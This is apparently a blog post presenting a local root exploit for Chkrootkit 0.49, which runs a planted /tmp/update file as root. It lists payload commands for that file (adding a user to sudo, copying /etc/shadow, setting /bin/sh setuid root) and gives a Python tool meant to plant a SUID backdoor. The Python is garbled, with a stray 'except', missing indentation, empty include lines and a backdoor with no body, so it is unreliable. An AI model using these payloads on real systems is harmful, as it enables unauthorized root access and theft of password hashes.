Local root exploit in Chkrootkit

Hello !

Security researchers have found an local exploit for Chkrootkit 0.49 who allow to a simple user to make root’s commands (the current Chkrootkit version is 0.50)

Proof of concept

When Chkrootkit is executed a file ‘/tmp/update’ is executed with the permissions of user who launched Chkrootkit .
For launch Chkrootkit we use sudo for run it as superuser like this

sudo chkrootkit

if we run it as a simple user like this :

hd@kali:/root$ chkrootkit
chkrootkit need root privileges

We must run Chkrookit as root , so the file ‘/tmp/update’ too .
Now we can create ‘/tmp/update’ for become root .

Privileges escalation

Make a user sudoer

adduser bob sudo

Read /etc/shadow

cat /etc/shadow > /tmp/shadow

and you read /tmp/shadow .

Get a root shell

chown root:root /bin/sh ; chmod 4777 /bin/sh

For get a root shell you must execute ‘/bin/sh’

bash-4.4$ whoami
bash-4.4$ /bin/sh
# whoami

Don’t forget to chmod ‘tmp/update’

chmod +x /tmp/update


'/tmp/update' is executed every time when Chkrootkit is executed so check the cron for find when chkrootkit is launched .
After this the content of '/tmp/update' file will be executed and you can become root or make command as root .

Exploit's doc : https://www.exploit-db.com/exploits/33899/

I've made a tool in python to get r00t using this exploit


import commands
import sys
import time
import os

chkrootkit = '/usr/sbin/chkrootkit'

print("[*] checking if chkrootkit is installed")
if (os.path.exists(chkrootkit)) == True :
print ("[+] chkrootkit is installed ")
if (os.path.exists(chkrootkit)) == False :
print ("[-] chkrootkit isn't installed ")
except :
sys.exit("[-] chkrootkit is not installed")

print("[*] checking if chkrootkit's version is vulnerable")
sortie = (commands.getoutput("{} -V ".format(chkrootkit)))
if "0.49" in (sortie):
print("[+] chkrootkit is vulnerable")
elif not "0.49" in (sortie):
print("[-] chkrootkit is not vulnerable")

print("[*] writting SUID executable ")
fichier = open("/var/tmp/suid.c","w")

#simple SUID backdoor
fichier.write("#include \n")
fichier.write("#include \n")
fichier.write("#include \n")
fichier.write("#include \n")
fichier.write("int main()\n")
fichier.write("return 0;\n")

print("[*] compiling SUID executable")
os.system("gcc /var/tmp/suid.c -o /var/tmp/suid")
print("[*] exploit chkrootkit vulnerability ")
update = open("/tmp/update","w")
update.write("chown root:root /var/tmp/suid ; chmod 4755 /var/tmp/suid")
os.system("chmod +x /tmp/update")
print("[*] waiting 5 minutes before chkrootkit execute our backdoor with root permissions")
if "-rwsr-xr-x" in (commands.getoutput("ls -lah /var/tmp/suid")) :
print("got r00t ? ")
elif "-rwsr-xr-x" not in (commands.getoutput("ls -lah /var/tmp/suid")) :
print("""[-] chkrootkit wasn't executed by crontab in 5 minutes ... You need wait chkrootkit's execution by crontab then you execute /var/tmp/suid and you will get an root-shell """)


Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion / Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion / Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion / Changer )

Photo Google+

Vous commentez à l'aide de votre compte Google+. Déconnexion / Changer )

Connexion à %s